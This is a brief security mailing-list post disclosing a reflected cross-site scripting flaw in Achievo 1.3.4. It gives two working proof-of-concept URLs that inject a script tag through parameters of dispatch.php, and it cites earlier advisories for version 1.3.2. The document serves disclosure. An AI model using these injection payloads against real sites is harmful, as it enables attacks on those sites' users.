Re: [InterN0T] Achievo 1.3.4 - XSS Vulnerability
In regards to the previous researchers i found out this vulnerability and
another has already been disclosed.
http://www.securityfocus.com/bid/31326/info (ver 1.3.2)
http://secunia.com/advisories/31973/ (ver. 1.3.2)
However, i can confirm that the vulnerability below still exists in the newest
version (1.3.4) of the platform as well:
http://www.website.tld/achievo/dispatch.php?atknodetype=">><script>alert(1)</script>&atkaction=adminpim&atklevel=-1&atkprevlevel%20=0&achievo=cgvuu4c9nv45ofdq8ntv1inm82
If One would like the XSS to be triggered directly on the site the user enters,
One can prepend > after ">.
Example: (thanks to Rohit Bansal for this information)
http://www.website.tld/achievo/dispatch.php?atknodetype=&atkaction=">><script>alert(1)</script>&atklevel=-1&atkprevlevel
=0&achievo=cgvuu4c9nv45ofdq8ntv1inm82
I'm sorry i didn't check other sites before submitting.
All of the best,
MaXe